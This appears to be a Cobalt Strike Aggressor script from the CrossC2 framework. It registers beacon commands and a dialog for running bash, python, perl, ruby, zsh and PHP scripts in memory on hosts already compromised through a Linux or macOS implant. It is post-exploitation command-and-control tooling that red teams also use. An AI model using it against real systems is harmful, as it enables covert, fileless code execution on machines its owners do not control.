
#include(script_resource("CrossC2Kit.cna"));

sub printUsage_script {
    blog($1, "\nUsage: cc2_script [<scriptType>|<scriptEnginePath>] <scriptLocalPath> <scriptArgs>\n\tcc2_script python c:\\getsysteminfo.py all\n\tcc2_script /usr/bin/ruby c:\\getsysteminfo.rb all\n\t<scriptType>\t\tpython/bash/perl/ruby\n\t<scriptEnginePath>\t\t/bin/bash | /usr/bin/python | /usr/bin/perl (default seach ScriptName in SystemPath.)\n");
}

ssh_alias cc2_script {
    $taskResType = "info"; # info -> normal message

    $beaconid = $1;
    $scriptType = $2;
    $scriptEnginePath = 'null';
    $scriptLocalPath = $3;
    $transportArg = $4;


    if ($scriptType && $scriptLocalPath && $transportArg) {
        if (indexOf($scriptType, "/")) {
            $scriptEnginePath = $scriptType;
        }
        brun_script_in_mem($beaconid, $scriptType, $scriptEnginePath, $taskResType, $scriptLocalPath, $transportArg);
    } else {
        berror($beaconid, "*[error]: error script load");
        printUsage_script($beaconid);
    }

}

ssh_command_register("cc2_script", "CrossC2 Script - run scripts in memory", "\nUsage: cc2_script [<scriptType>|<scriptEnginePath>] <scriptLocalPath> <scriptArgs>\n\tcc2_script python c:\\getsysteminfo.py all\n\tcc2_script /usr/bin/ruby c:\\getsysteminfo.rb all\n\t<scriptType>\t\tpython/bash/perl/ruby\n\t<scriptEnginePath>\t\t/bin/bash | /usr/bin/python | /usr/bin/perl (default seach ScriptName in SystemPath.)\n");


ssh_alias python {
    $taskResType = "info"; # info -> normal message
    CrossC2MemScriptEng("python", $taskResType, @_);
}

ssh_command_register("python", "CrossC2 Python Script - run script in memory", "\nUsage: python [<scriptContent>|<scriptLocalPath>] \n\tpython c:\\getsysteminfo.py <arg1> <arg2> <argN>\n\tpython import os; os.system('whoami')\n");


ssh_alias bash {
    $taskResType = "info"; # info -> normal message
    CrossC2MemScriptEng("bash", $taskResType, @_);
}

ssh_alias zsh {
    $taskResType = "info"; # info -> normal message
    CrossC2MemScriptEng("zsh", $taskResType, @_);
}

ssh_command_register("bash", "CrossC2 Bash Script - run script in memory", "\nUsage: bash [<scriptContent>|<scriptLocalPath>] \n\tbash c:\\getsysteminfo.sh <arg1> <arg2> <argN>\n\tbash for i in `ls`;do echo \$i; done\n");

ssh_alias perl {
    $taskResType = "info"; # info -> normal message
    CrossC2MemScriptEng("perl", $taskResType, @_);
}

ssh_command_register("perl", "CrossC2 Perl Script - run script in memory", "\nUsage: perl [<scriptContent>|<scriptLocalPath>] \n\tperl c:\\getsysteminfo.pl\n\tperl \$a = 'hello';print \$a\n");

ssh_alias ruby {
    $taskResType = "info"; # info -> normal message
    CrossC2MemScriptEng("ruby", $taskResType, @_);
}

ssh_command_register("ruby", "CrossC2 Ruby Script - run script in memory", "\nUsage: ruby [<scriptContent>|<scriptLocalPath>] \n\truby c:\\getsysteminfo.rb\n\truby puts 'hello'\n");


ssh_alias php {
    $taskResType = "info"; # info -> normal message
    CrossC2MemScriptEng("php", $taskResType, @_);
}

ssh_command_register("php", "CrossC2 PHP Script - run script in memory", "\nUsage: php [<scriptContent>|<scriptLocalPath>] \n\tphp c:\\getsysteminfo.php\n\tphp <?php phpinfo(); ?>\n");


sub openRunScriptDialogCallBack {
    $scriptFile = $3['scriptFile'];
    $scriptContent = $3['scriptContent'];
    $scriptType = $3['scriptType'];
    $scriptArgs = $3['scriptArgs'];
    $taskResType = "info"; # info -> normal message

    if ($scriptFile ne $null) {
        @script_config = @($bid, $scriptFile); # script_config => @( bid, script_path, arg1, arg2, ... , argN )
        @script_args = split(" ", $scriptArgs);
        foreach $index => $value (@script_args) {
            push(@script_config,$value);
        }
        CrossC2MemScriptEng($scriptType, $taskResType, @script_config);
    } else {
        @script_config = @($bid); # script_config => @( bid, script_content_split_with_space )
        @script_args = split(" ", $scriptContent);
        foreach $index => $value (@script_args) {
            push(@script_config,$value);
        }
        CrossC2MemScriptEng($scriptType, $taskResType, @script_config);
    }
}

sub openRunScriptDialog {
    $bid = $1;
    $dialog = dialog("RunScriptInMemory", %(bid => $bid, scriptFile => "", scriptContent => "", scriptType => "", scriptArgs => ""), &openRunScriptDialogCallBack);
    dialog_description($dialog, "run script in memory");

    drow_combobox($dialog, "scriptType", "scriptType: ", @("bash", "python", "zsh", "perl", "ruby", "php"));
    drow_file($dialog, "scriptFile", "scriptFile: ");
    drow_text($dialog, "scriptArgs", "run args: ");

    drow_text_big($dialog, "scriptContent", "or input Script Content:");

    dbutton_action($dialog, "run");
    dialog_show($dialog);
}